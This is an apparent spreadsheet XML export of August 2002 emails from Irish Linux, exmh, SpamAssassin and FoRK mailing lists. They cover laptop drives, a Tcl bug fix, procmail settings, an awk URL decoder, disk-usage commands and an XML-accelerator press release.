    <t>To: ilug@linux.ie\nFrom: Vincent Cunniffe &lt;vincent@cunniffe.net&gt;\nDate: Tue, 27 Aug 2002 23:38:00 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 23:38:00 +0100</t>
  </si>
  <si>
    <t>Darren Kenny wrote:\n&gt; Hi,\n&gt; \n&gt; I've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use \n&gt; with a Dell Latitude CPx laptop that I've got. Does anyone know any way \n &gt; enable this, for example through the use of a special cable for the\n &gt; Modular Bay (where CD-ROM or floppy drive is normally).\n\nThere is absolutely no way to use a conventional 3.5" drive with a\nlaptop directly. However, you can get an external firewire or USB\ncradle and attach it to the laptop like that, and any 3.5" drive\nwill work in that case.\n\nExample :\n\n[URL]http://www.microsense.com[/URL]\n\nRegards,\n\nVin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.microsense.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Darren Kenny &lt;Darren.Kenny@Sun.COM&gt;\nDate: Tue, 27 Aug 2002 22:31:39 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 22:31:39 +0100</t>
  </si>
  <si>
    <t>Darren Kenny &lt;Darren.Kenny@Sun.COM&gt;</t>
  </si>
  <si>
    <t>[ILUG] Using Normal IDE Device with a Dell Latitude CPx laptop</t>
  </si>
  <si>
    <t>Hi,\n\nI've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use with a\nDell Latitude CPx laptop that I've got. Does anyone know any way to enable this,\nfor example through the use of a special cable for the Modular Bay (where CD-ROM\nor floppy drive is normally).\n\nThere is also the possibility of using a docking station, but Dell's docking\nsolution for the Latitude series doesn't seem to allow for the use of an IDE\ndrive, only SCSI... Unless someone knows of a "non-Dell" solution that's\ncompatible.\n\nAnyone any ideas?\n\nThanks,\n\nDarren.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: kchrist@lsil.com\nDate: Tue, 27 Aug 2002 22:11:41 -0600</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 22:11:41 -0600</t>
  </si>
  <si>
    <t>I may be wrong but I think a single select entry field is used for selecting messages and switching folders. Restricting the entries to be numeric would break the folder switching functionality, wouldn't it? My version of MsgChange, not yet updated, has a check     if {$msgid != {}} { 	# Allow null msgid from Msg_ShowWhat, which supplies line instead 	if {$msgid &lt; 0}  return     } else {     ... at the start of the procedure which takes care of the single '-' case. Perhaps the thing to do is for MsgChange to validate a msgid as a number before continuing. Kevin In message &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;, Brent Welch writes: &gt; You can also duplicate thiswith &gt;  &gt; MsgChange - noshow &gt;  &gt; at the Tcl prompt in the Log window.  I suspect that the sequence &gt; parser, which understands things like 5-22 to mean messages 5 through 22 &gt; is confused when asked to add/remove message "-" from a sequence. &gt;  &gt; If we are allowed to assume 8.2 or higher, which we can't really, then &gt; we could add &gt;  &gt; if {![string is integer $select(sel)]} { &gt;    # bail out of message select mode &gt; } &gt; to the SelectTypein procedure. &gt;  &gt; We can probably survive with &gt;  &gt; if {![regexp {^[0-9]+$} $select(sel)]} { &gt;     #bail out of message select mode &gt; } &gt;  &gt; &gt;&gt;&gt;Robert Elz said: &gt;  &gt;     Date:        Mon, 26 Aug 2002 09:27:56 -0500 &gt;  &gt;     From:        Chris Garrigues  m&gt; &gt;  &gt;     Message-ID:  &lt;1030372078.11075.TMDA@deepeddy.vircio.com&gt; &gt;  &gt;  &gt;  &gt;   | Tell me what keystroke made it happen so I can reproduce it and I'll &gt;  &gt;   | see what I can do about it (or if I can't, I'll hand it off to  &gt; Brent). &gt;  &gt;  &gt;  &gt; Don't worry too much about it, you seem to have plenty of other things &gt;  &gt; to do in the immediate future, and this one isn't so critical that people &gt;  &gt; can't use the code in normal ways. &gt;  &gt;  &gt;  &gt; But, to make it happen, type (with normal key bindings) any digit, so the &gt;  &gt; code thinks you're trying a message number, then backspace, so the digit &gt;  &gt; goes away, then '-' (other junk characters don't seem to have the &gt;  &gt; problem, I have just been playing).   That will do it (every time). &gt;  &gt;  &gt;  &gt; That is: 0 ^h - &gt;  &gt;  &gt;  &gt; Once you get into that state, the same traceback occurs for every &gt;  &gt; character you type, until a message is selected with the mouse. &gt;  &gt;  &gt;  &gt; This is looking like it might be easy to find and fix, so I'll take a &gt;  &gt; look at it later. &gt;  &gt;  &gt; -- &gt; Brent Welch &gt; Software Architect, Panasas Inc &gt; Pioneering the World's Most Scalable and Agile Storage Network &gt; [URL]www.panasas.com[/URL] &gt; welch@panasas.com &gt;  &gt;  &gt;  &gt;  &gt; _______________________________________________ &gt; Exmh-workers mailing list &gt; Exmh-workers@redhat.com &gt; [URL]https://listman.redhat.com[/URL] _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>www.panasas.com https://listman.redhat.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: "'Ronan Waide'" &lt;waider@waider.ie&gt;, "'ILUG list'" &lt;ilug@linux.ie&gt;\nFrom: "Spam" &lt;spam@bite-ltd.com&gt;\nDate: Tue, 27 Aug 2002 21:38:40 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 21:38:40 +0100</t>
  </si>
  <si>
    <t>"Spam" &lt;spam@bite-ltd.com&gt;</t>
  </si>
  <si>
    <t>"'Ronan Waide'" &lt;waider@waider.ie&gt;, "'ILUG list'" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] doolin</t>
  </si>
  <si>
    <t>Might just take a trip over there later tomorrow, it is after all only\non my backdoor-step...\n\nE.\n\n\n\n-----Original Message-----\nFrom: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie] On Behalf Of\nRonan Waide\nSent: 27 August 2002 21:19\nTo: ILUG list\nSubject: [ILUG] doolin\n\n\nIf you're not in Doolin, beg, borrow, or steal your way there before the\nLBW folk depart. It's far too much fun.\n\nCheers,\nWaider. Just back.\n-- \nwaider@waider.ie / Yes, it /is/ very personal of me.\n"...we are in fact well and truly doomed. She says that if I leave now, \n I can probably get a good head start before they realize that I'm\ngone."\n                                                    - Jamie Zawinski\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription\ninformation. List maintainer: listmaster@linux.ie\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Justin Mason &lt;yyyy@spamassassin.taint.org&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Tue, 27 Aug 2002 21:36:22 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 21:36:22 -0400</t>
  </si>
  <si>
    <t>Justin Mason &lt;yyyy@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: FAQ: taint warnings from SA in /etc/procmailrc</t>
  </si>
  <si>
    <t>--wLAMOaPNJ0fu1fTG\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Wed, Aug 28, 2002 at 12:14:24AM +0100, Justin Mason wrote:\n&gt; actually, I think procmail supports this directly. use DROPPRIVS=3Dyes\n&gt; at the top of the /etc/procmailrc.\n\nHey, look at that!\n\n       DROPPRIVS   If  set  to	`yes'  procmail  will drop all privileges\n		   it might have had (suid or sgid).  This is only\n		   useful if you want to guarantee that the bottom half\n		   of  the /etc/procmailrc file is executed on behalf\n		   of the recipient.\n\nOf course, removing setuid/gid bits on programs that don't need it is\nalways a good idea.  A general rule of system administration: don't give\nout permissions unless you absolutely need to.   ;)\n\n--=20\nRandomly Generated Tagline:\n"The cardinal rule at our school is simple. No shooting at teachers. If\n you have to shoot a gun, shoot it at a student or an administrator."\n                 - "Word Smart II", from Princeton Review Pub.\n\n--wLAMOaPNJ0fu1fTG\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9bCkWAuOQUeWAs2MRAr+iAJ9cVLx61vWsC5KFDLYv9/T7FaZmxACgzUpC\nf235rrVr6cI8LvPC+IeIss0=\n=BsCM\n-----END PGP SIGNATURE-----\n\n--wLAMOaPNJ0fu1fTG--</t>
  </si>
  <si>
    <t>http://www.gnupg.org</t>
  </si>
  <si>
    <t>To: David Neary &lt;dneary@wanadoo.fr&gt;\nFrom: Paul Jakma &lt;paul@clubi.ie&gt;\nDate: Tue, 27 Aug 2002 21:32:26 +0100 (IST)</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 21:32:26 +0100 (IST)</t>
  </si>
  <si>
    <t>Paul Jakma &lt;paul@clubi.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002, David Neary wrote: &gt; &gt; Actually the following would be in some way sensible: &gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`" &gt;  &gt; Why {2,2}? Why not {2}? no idea. the above was something along the lines i was attempting, once i  realised it was a straight swap. but i couldnt get awk's gensub to  insert the \x for %'s and ='s. anyway, in the end i found something on the internet and adapted it: function decode_url (str,    hextab,i,c,c1,c2,len,code) {         # hex to dec lookup table         hextab ["0"] = 0;       hextab ["8"] = 8;         hextab ["1"] = 1;       hextab ["9"] = 9;         hextab ["2"] = 2;       hextab ["A"] = 10;         hextab ["3"] = 3;       hextab ["B"] = 11;         hextab ["4"] = 4;       hextab ["C"] = 12;         hextab ["5"] = 5;       hextab ["D"] = 13;         hextab ["6"] = 6;       hextab ["E"] = 14;         hextab ["7"] = 7;       hextab ["F"] = 15;         decoded = "";         i   = 1;         len = length (str);         while ( i &lt;= len ) {                 c = substr (str, i, 1);                 # check for usual start of URI hex encoding chars                 if ( c == "%" || c == "=" ) {                         if ( i+2 &lt;= len ) {                                 # valid hex encoding?                                 c1 = toupper(substr(str, i+1, 1));                                 c2 = toupper(substr(str, i+2, 1));                                 if ( !(hextab [c1] == "" &amp;&amp; hextab [c2] == "") ) {                                         code = 0 + hextab [c1] * 16 + hextab [c2] + 0                                         c = sprintf ("%c", code)                                         i = i + 2                                 }                         }                 # + is space apparently                 } else if ( c == "+" ) {                         c = " "                 }                 decoded = decoded c;                 ++i;         }         return decoded } &gt; Cheers, &gt; Dave. &gt; PS the late reply is because the footer on the original mail (If &gt; you received this mail in error yadda yadda) got caught in my &gt; spam filter, and ended up in my junkmail directory. he he... might not have been the footer - check my headers. :) regards, --  Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A 	warning: do not ever send email to spam@dishone.st Fortune: One nuclear bomb can ruin your whole day. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Paul Kelly &lt;longword@esatclear.ie&gt;\nDate: Tue, 27 Aug 2002 21:25:02 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 21:25:02 +0100</t>
  </si>
  <si>
    <t>Philip Reynolds wrote:\n&gt;&gt;Does anyone know how to list the biggest file in my\n&gt;&gt;root directory?or the second biggest ..etc...\n&gt; $ find /dir -name \*  | xargs du -s | sort -n\n\nYou might want to put a '-type f' on that find.\n\nPaul.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG list &lt;ilug@linux.ie&gt;\nFrom: Ronan Waide &lt;waider@waider.ie&gt;\nDate: Tue, 27 Aug 2002 21:19:10 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 21:19:10 +0100</t>
  </si>
  <si>
    <t>Ronan Waide &lt;waider@waider.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] doolin</t>
  </si>
  <si>
    <t>If you're not in Doolin, beg, borrow, or steal your way there before\nthe LBW folk depart. It's far too much fun.\n\nCheers,\nWaider. Just back.\n-- \nwaider@waider.ie / Yes, it /is/ very personal of me.\n"...we are in fact well and truly doomed. She says that if I leave now, \n I can probably get a good head start before they realize that I'm gone."\n                                                    - Jamie Zawinski\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org (Justin Mason),\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Tue, 27 Aug 2002 20:43:59 -0700</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 20:43:59 -0700</t>
  </si>
  <si>
    <t>yyyy@spamassassin.taint.org (Justin Mason),</t>
  </si>
  <si>
    <t>Re: patent on TMDA-like system</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nOn Tuesday 27 August 2002 07:45 am, Justin Mason wrote:\n&gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent:\n&gt;\n&gt; [URL]http://appft1.uspto.gov[/URL]\n&gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam\n&gt;\n&gt;   Method of anti-spam\n&gt;\n&gt;   Abstract\n&gt;\n&gt;   A method of anti-spam is to set an optional trustcode, or a trustlist, or\n&gt;   at least a trustweb based on online mail delivery at a recipient's e-mail\n&gt;   address. A mail sender is compelled at the first time to deliver a mail\n&gt; by way of: taking the way of "Visiting trustweb and sending online", or\n&gt; enclosing the recipient's trustcode in the mail and sending in another way\n&gt; other than the mentioned. After the sender's e-mail address has been stored\n&gt; automatically in the recipient's trustlist, the sender may send mails to\n&gt; the same recipient in whatever the ways feasible.\n&gt;\n&gt;\n&gt; Sounds a lot like TMDA to me. :(  Filing date is July 26, 2001,  granted\n&gt; May 16, 2002.\n&gt;\n&gt; TMDAers, have you seen this before?  I'd presume TMDA is prior art, but\n&gt; still, it could be troublesome...\n&gt;\n&gt;\nI took a bit of time to review what is on the above URL.  If I were a news \neditor, the headline would be:\n\n"Inventor" from country that ignores patents and copyrights, seeks patent for \ninventing the wheel!\n- -- \n- ------------------------------------------------------------------------\nRobin Lynn Frank---Director of Operations---Paradigm, Omega, LLC\n[URL]http://paradigm-omega.com[/URL]              [URL]http://paradigm-omega.net[/URL]\n 2002.  All rights reserved.  No duplication/dissemination permitted.\nUse of PGP/GPG encrypted mail preferred. No HTML/attachments accepted.\nFingerprint:  08E0 567C 63CC 5642 DB6D  D490 0F98 D7D3 77EA 3714\nKey Server:  [URL]http://paradigm-omega.com[/URL]\n- ------------------------------------------------------------------------\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9bEcKD5jX03fqNxQRAmTfAKDM6BDsePbg8fb9Ore0XuS5jB4t1wCfbTcw\n/PBXqXO7Pei1f9lIj4gd0/c=\n=PNJx\n-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>http://appft1.uspto.gov http://paradigm-omega.com http://paradigm-omega.net http://paradigm-omega.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Philip Reynolds &lt;phil@redbrick.dcu.ie&gt;\nDate: Tue, 27 Aug 2002 20:36:02 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 20:36:02 +0100</t>
  </si>
  <si>
    <t>Inn Share's [shareinnn@yahoo.com] 22 lines of wisdom included:\n&gt; \n&gt; Hi,all:\n&gt; \n&gt; Does anyone know how to list the biggest file in my\n&gt; root directory?or the second biggest ..etc...\n&gt; \n&gt; Because I want to find out what is the reason cause my\n&gt; root all most full.\n\n$ find /dir -name \*  | xargs du -s | sort -n\n\nSmallest files are listed first with the largest at the end. So if\nyou want to get the 5 largest files, pipe through tail.\n\ne.g.\n\n$ find /dir -name \*  | xargs du -s | sort -n | tail -5\n-- \n  Philip Reynolds        \n   RFC Networks          tel: 01 8832063\n[URL]www.rfc-networks.ie[/URL]      fax: 01 8832041\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;\nDate: Tue, 27 Aug 2002 19:26:50 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 19:26:50 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Got me a crappy laptop</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002, Jon wrote:\n\n&gt; I has just been given an old Toshiba CS100 with earliest pentium and 400mb\n&gt; of HD but only a floppy drive on it, its got Win3.1 which is funny to see\n&gt; again but gonna be cleared as soon as i stop messing with it. What I was\n&gt; wondering was could anyone advise what O/S would be good for this, I want a\n&gt; small usable *nix distro for it that i can transfer to it fom floppy.\n&gt; Connecting this to Winblows&gt;i know that winblows allows pier-to-pier\n&gt; connections over serial and parellel ports to other winblows but is this\n&gt; easy do for connecting winblows to *nix???\n\nHave done exactly this with debian, only I used a PCMCIA network card and\ndid it off ftp.esat.net (ucd bandwidth is rather good).\n\nHowever, if you've another machine, look into this null modem cable jobby:\n\n[URL]http://rosebud.sps.queensu.ca[/URL]\n\nwhether you can connect that to direct cable connectionI've no idea.  You\ncould however, put the files onto windows, boot onto a ILUG BBC[tm] and\nmount the fat32 partition.\n\nEasier/Quicker way is to get your hands on a PCMCIA nic.  Also makes the\nmaptop far more useful in the long run.\n\nGavin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://rosebud.sps.queensu.ca http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Jon" &lt;zeez@eircom.net&gt;\nDate: Tue, 27 Aug 2002 19:14:48 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 19:14:48 +0100</t>
  </si>
  <si>
    <t>"Jon" &lt;zeez@eircom.net&gt;</t>
  </si>
  <si>
    <t>[ILUG] Got me a crappy laptop</t>
  </si>
  <si>
    <t>Hey,\nI has just been given an old Toshiba CS100 with earliest pentium and 400mb\nof HD but only a floppy drive on it, its got Win3.1 which is funny to see\nagain but gonna be cleared as soon as i stop messing with it. What I was\nwondering was could anyone advise what O/S would be good for this, I want a\nsmall usable *nix distro for it that i can transfer to it fom floppy.\nConnecting this to Winblows&gt;i know that winblows allows pier-to-pier\nconnections over serial and parellel ports to other winblows but is this\neasy do for connecting winblows to *nix???\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Tyana Archive &lt;tyana@1starnet.com&gt;,\nFrom: Rob Solarion &lt;solarion@1starnet.com&gt;\nDate: Tue, 27 Aug 2002 18:40:01 -0600</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:40:01 -0600</t>
  </si>
  <si>
    <t>Rob Solarion &lt;solarion@1starnet.com&gt;</t>
  </si>
  <si>
    <t>Tyana Archive &lt;tyana@1starnet.com&gt;,</t>
  </si>
  <si>
    <t>[zzzzteana] "Put this in your stereo and smoke it ... "</t>
  </si>
  <si>
    <t>[URL]http://www.ouchytheclown.com[/URL]\n\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.ouchytheclown.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: Matt Sergeant &lt;msergeant@startechgroup.co.uk&gt;\nFrom: "Tony L. Svanstrom" &lt;tony@svanstrom.com&gt;\nDate: Tue, 27 Aug 2002 18:31:02 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:31:02 +0200 (CEST)</t>
  </si>
  <si>
    <t>MacOS X (Re: [SAtalk] [OT] Habeas-talk (was: 2.40 RELEASE: oops</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002 the voices made Matt Sergeant write:\n\n&gt; I've got 6C115 (I think) the current developer release (though not the same\n&gt; as gold).\n\n The only difference AFAIK is the path to a single helpfile, which we don't use\nanyways, right? *G*\n\n\n	/Tony\nPS I also have a problem with that stupid helpprogram crasching whenever I\nsearch for "windows"; not sure if that's a feature or not. =)\n-- \n# Per scientiam ad libertatem! // Through knowledge towards freedom! #\n# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #\n\n     perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'\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fork@spamassassin.taint.org\nFrom: "John Evdemon" &lt;jevdemon@acm.org&gt;\nDate: Tue, 27 Aug 2002 18:29:59 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:29:59 -0400</t>
  </si>
  <si>
    <t>Re: DataPower announces XML-in-silicon</t>
  </si>
  <si>
    <t>On 27 Aug 2002 at 15:00, Rohit Khare wrote:\n&gt; \n&gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device\n&gt; designed specifically to process XML data. Unlike competing\n&gt; solutions that process XML data in software, DataPower's\n&gt; device processes the data in hardware -- a technology\n&gt; achievement that provides greater performance, according to\n&gt; company officials.\n&gt;\nSarvega seems to have a similar product.  [URL]http://www.sarvega.com[/URL]</t>
  </si>
  <si>
    <t>http://www.sarvega.com</t>
  </si>
  <si>
    <t>To: "Rohit Khare" &lt;khare@alumni.caltech.edu&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "Meltsner, Kenneth" &lt;Kenneth.Meltsner@ca.com&gt;\nDate: Tue, 27 Aug 2002 18:18:37 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 18:18:37 -0400</t>
  </si>
  <si>
    <t>"Meltsner, Kenneth" &lt;Kenneth.Meltsner@ca.com&gt;</t>
  </si>
  <si>
    <t>"Rohit Khare" &lt;khare@alumni.caltech.edu&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: DataPower announces XML-in-silicon</t>
  </si>
  <si>
    <t>If it's not stateful, it wouldn't seem to be worth the effort, although I guess it might help with DDoS attacks.\n\nSounds snake-oilish to me, but I'm biased by lots of experience with firewalls and proxy servers, and the limitations thereof.\n\nKen\n\n\n&gt; -----Original Message-----\n&gt; From: Rohit Khare [mailto:khare@alumni.caltech.edu]\n&gt; Sent: Tuesday, August 27, 2002 5:00 PM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: DataPower announces XML-in-silicon\n&gt; \n&gt; \n&gt; No analysis yet... don't know what to make of it yet. But \n&gt; here's the raw \n&gt; bits for all to peruse and check out what's really going on... Best, \n&gt; Rohit\n&gt; \n&gt; ===========================================================\n&gt; \n&gt; DataPower delivers XML acceleration device\n&gt; ByScott Tyler Shafer\n&gt; August 27, 2002 5:46 am PT\n&gt; \n&gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed \n&gt; specifically to process XML data. Unlike competing solutions that \n&gt; process XML data in software, DataPower's device processes \n&gt; the data in \n&gt; hardware -- a technology achievement that provides greater \n&gt; performance, \n&gt; according to company officials.\n&gt; \n&gt; The new device, dubbed DataPower XA35 XML Accelerator, is the \n&gt; first in a \n&gt; family of products expected from the Cambridge, Mass.-based \n&gt; startup. The \n&gt; DataPower family is based on a proprietary processing core technology \n&gt; called XG3 that does the analysis, parsing, and processing of the XML \n&gt; data.\n&gt; \n&gt; According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was \n&gt; conceived to meet the steady adoption of XML, the anticipated future \n&gt; proliferation of Web services, and as a means to share data \n&gt; between two \n&gt; businesses.\n&gt; \n&gt; "Our vision is to build out an XML-aware infrastructure," Kelly said. \n&gt; "The XA35 is the first of a family."\n&gt; \n&gt; Kelly explained that converting data into XML increases the \n&gt; file size up \n&gt; to 20 times. This, he said, makes processing the data very taxing on \n&gt; application servers; DataPower believes an inline device is the best \n&gt; alternative.\n&gt; \n&gt; In addition to the large file sizes, security is also of paramount \n&gt; importance in the world of XML.\n&gt; \n&gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly \n&gt; said. "A SOAP packet with XML will go straight through a firewall. \n&gt; Firewalls are blind to XML today."\n&gt; \n&gt; Future products in DataPowers family will focus more specifically on \n&gt; security, especially as Web services proliferate, Kelly said.\n&gt; \n&gt; According to DataPower, most existing solutions to offload XML \n&gt; processing are homegrown and done in software -- an approach \n&gt; the company \n&gt; itself tried initially and found to be inadequate with \n&gt; regards to speed \n&gt; and security. After trying the software path, the company turned to \n&gt; creating a solution that would process XML in hardware.\n&gt; \n&gt; "Our XG3 execution core converts XML to machine code," said Kelly, \n&gt; adding that to his knowledge no other company's solution does. Kelly \n&gt; said in the next few months he expects the market to be flooded with \n&gt; technologies that claim to do XML processing -- claims that \n&gt; he believes \n&gt; will be mostly false.\n&gt; Other content-aware switches, such as SSL (secure socket layer) \n&gt; accelerators and load balancers, look at the first 64 bytes \n&gt; of a packet, \n&gt; while the XA35 provides deeper packet inspection, looking at \n&gt; 1,400 bytes \n&gt; and thus enabling greater processing of XML data, Kelly explained.\n&gt; \n&gt; The 1U-high network device has been tested against a large \n&gt; collection of \n&gt; XML and XSL data types and can learn new flavors of the \n&gt; markup language \n&gt; as they pass through the device.\n&gt; \n&gt; The XA35 can be deployed in proxy mode behind a firewall and a load \n&gt; balancer, and it will inspect all traffic that passes and \n&gt; will identify \n&gt; and process those packets that are XML, Kelly said.\n&gt; \n&gt; In addition to proxy mode, the device can also be used as an \n&gt; application \n&gt; co-processor. This deployment method gives administrators \n&gt; more granular \n&gt; control over what data is inspected and the application server itself \n&gt; controls the device.\n&gt; \n&gt; DataPower is not the only company chasing this emerging \n&gt; market. Startup \n&gt; Sarvega, based in Burr Ridge, Ill., introduced the Sarvega \n&gt; XPE switch in \n&gt; May, and earlier this month Tarari, an Intel spin-off, \n&gt; launched with a \n&gt; focus on content processing and acceleration.\n&gt; The DataPower device is now available, priced starting at \n&gt; $54,995. The \n&gt; company has announced one customer to date and says the product is in \n&gt; field trails at a number of other enterprises.\n&gt; \n&gt; ==============================================================\n&gt; ===========\n&gt; \n&gt; DataPower has been addressing enterprise networking needs \n&gt; since it was \n&gt; founded in early 1999 by Eugene Kuznetsov, a technology visionary who \n&gt; foresaw the adverse effects XML and other next generation protocols \n&gt; would have on enterprise networks. Long before industry \n&gt; interest in XML \n&gt; grew, Kuznetsov assembled a team of world-class M.I.T. engineers and \n&gt; designed the industry's first solutions to address the unique \n&gt; requirements for processing XML. The first such solution was \n&gt; a software \n&gt; interpreter called DGXT. This software-based approach to XML \n&gt; processing \n&gt; is still licensed by many companies for use in their own \n&gt; products today.\n&gt; \n&gt; Leveraging the detailed knowledge and customer experience gained from \n&gt; developing software-based accelerators, Kuznetsov's team \n&gt; raised the bar \n&gt; and designed a system for processing XML in purpose-built \n&gt; hardware. In \n&gt; 2001, DataPower's effort produced XML Generation Three (XG3), the \n&gt; industry's fastest technology for XML processing, bar none.\n&gt; \n&gt; Today, XG3 technology powers the industry's first wire-speed XML \n&gt; network devices, enabling secure, high-speed applications and XML Web \n&gt; Services. While other companies are just now marketing first \n&gt; versions of \n&gt; products, DataPower is delivering its third generation of technology, \n&gt; providing an immediate return on technology investments to \n&gt; industry-leading customers and partners.\n&gt; \n&gt; DataPower's M.I.T. heritage is complemented by a management team that \n&gt; brings decades of experience in the networking and computing \n&gt; industries, \n&gt; drawing veteran leaders from several successful companies including \n&gt; Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.\n&gt; \n&gt; ==============================================================\n&gt; ===========\n&gt; \n&gt; DataPower Technology Secures $9.5 Million in Funding\n&gt; \n&gt; Venrock Associates, Mobius Venture Capital and Seed Capital \n&gt; Back Pioneer \n&gt; in XML-Aware Networking for Web Services\n&gt; \n&gt; CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the \n&gt; leading provider of XML-Aware network infrastructure, today announced \n&gt; that it has secured $9.5 million in series B financing. Investors for \n&gt; this round include Venrock Associates, Mobius Venture Capital \n&gt; and Seed \n&gt; Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, \n&gt; of Mobius, \n&gt; and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of \n&gt; Directors.\n&gt; \n&gt; DataPower will use this funding to accelerate development, \n&gt; marketing and \n&gt; sales of the companys breakthrough technology for XML-Aware \n&gt; networking. \n&gt; Founded in 1999, DataPower invented the worlds first intelligent XML \n&gt; networkingdevices, capable of transforming XML traffic and \n&gt; transactions \n&gt; at the wire-speed enterprises need to effectively embrace Web \n&gt; services \n&gt; and other XML-centric initiatives. DataPowers solutions are based on \n&gt; its 